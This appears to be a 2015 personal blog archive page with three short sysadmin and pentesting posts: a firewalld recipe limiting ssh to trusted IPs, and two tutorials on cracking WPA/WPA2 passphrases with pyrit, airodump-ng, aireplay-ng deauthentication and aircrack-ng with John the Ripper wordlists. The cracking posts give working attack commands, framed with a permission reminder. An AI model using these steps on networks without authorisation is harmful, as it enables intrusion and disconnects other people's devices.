Monthly Archives: June 2015

Home »  2015 »  June

Comments Off on limit ssh to specific hosts with firewalld (firewall-cmd)

Here is a little reminder on how to limit ssh (or any port really) to a specific IP using firewalld: <code> systemctl start firewalld.service systemctl enable firewalld.service firewall-cmd –zone=”trusted” –add-source=<external IP 1> firewall-cmd –zone=”trusted” –add-source=<external IP 1> –permanent firewall-cmd –zone=”trusted” –add-source=<external IP 2> firewall-cmd –zone=”trusted” –add-source=<external IP 2> –permanent firewall-cmd –zone=”trusted” –add-service=ssh firewall-cmd –zone=”trusted” –add-service=ssh –permanent firewall-cmd –zone=”trusted” –list-all firewall-cmd –zone=public –remove-service=ssh firewall-cmd –zone=public –remove-service=ssh –permanent </code>

Comments Off on pyrit – gpu wpa/wpa2 cracking

A little more on cracking wpa/wpa2 passphrases…. Why not bring in the GPU? Fun little program called pyrit – it does seem to require a wordfile though, I may have to try piping in JTR like we did with aircrack-ng… Anyway, here is a little tutorial Basically you take the cap file you made using airodump-ng and do something like this: (this one requires that you have imported passwords into it’s database) pyrit –all-handshakes -r WPAcrack-01.cap attack_batch

Comments Off on How about a little aircrack of wpa?

Make sure you own the network/wireless access point or have permission to attack/break in to the WPA network you are attacking before you start.  In this case I got permission, and I have several witnesses and documentation to support it. First do this to find the network airodump-ng -i wlan1 Focus in on that one network wap and capture the goodies airodump-ng –bssid 00:1E:52:78:AA:5C -c6 –write WPAcrack wlan1 on another interface, do a deauth to force devices to reconnect aireplay-ng –deauth 100 -a 00:1E:52:78:AA:5C wlan2 notice the “WPA handshake: 00:1E:52:78:AA:5C” at the top of the airodump screen? now crack it with this: aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/dirb/big.txt or by using john the ripper: john –incremental=all –session=WirelessBrute –stdout | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w – Resume works as well: john –restore=WirelessBrute | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w – the other I am doing right now john –incremental=all –session=BruteRockSteady […]